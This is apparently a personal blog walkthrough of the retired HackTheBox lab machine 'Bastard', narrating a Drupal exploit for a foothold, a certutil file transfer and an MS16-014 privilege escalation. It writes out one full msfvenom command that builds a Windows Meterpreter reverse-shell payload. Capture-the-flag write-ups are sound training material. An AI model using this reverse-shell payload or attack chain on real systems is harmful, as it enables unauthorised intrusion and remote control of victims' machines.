HacktheBox Bastard Walkthrough

    The other day, a friend asked if I was on HacktheBox and I was reminded that I'd been absent for a while.  Apparently, they are cranking out a new box every week which could be good or bad -- I'm not really sure.  While looking for something to write, I thought I'd take on one of their retired boxes and that would solve two "needs" simultaneously.  

    This box was interesting mostly because of the hunt for the exploit to gain a foothold on the system.  From there, it was trial and error as to which technique would work for a particular task.  After that, root was easy.

    First, we kick off with Nmap:

    Right off the bat, we see that we're running Windows / IIS and we're running Drupal. 

    We check out the Drupal site:

    We get the Drupal version:

    We run Droopescan:

    We search through Searchsploit:

    We find a vulnerability in Services with an exploit which does not work.  I tried troubleshooting the issue but no such luck.  I then go hunting the web and I find:

    Let's see if we can get a simple "whoami":


    Next, let's check out the architecture:

    We need a reverse shell:

    msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST= LPORT=443 -f exe >> mshell443.exe

    I realize I have a shell with that name and I rename my shell to bastard.exe

    After some trial and error with downloading the file, certutil proves to be the winner.  

    We move the shell to our victim:

    We check the directory as a sanity check.  I should also point out that I created that directory earlier. 

    We execute our shell:

    With our handler setup:

    We catch the inbound connection:

    We move to Exploit Suggester:

    For some reason, ms16-075 does not work.  I move to ms16-014:

    And... we're root!  

    © 2020 sevenlayers.com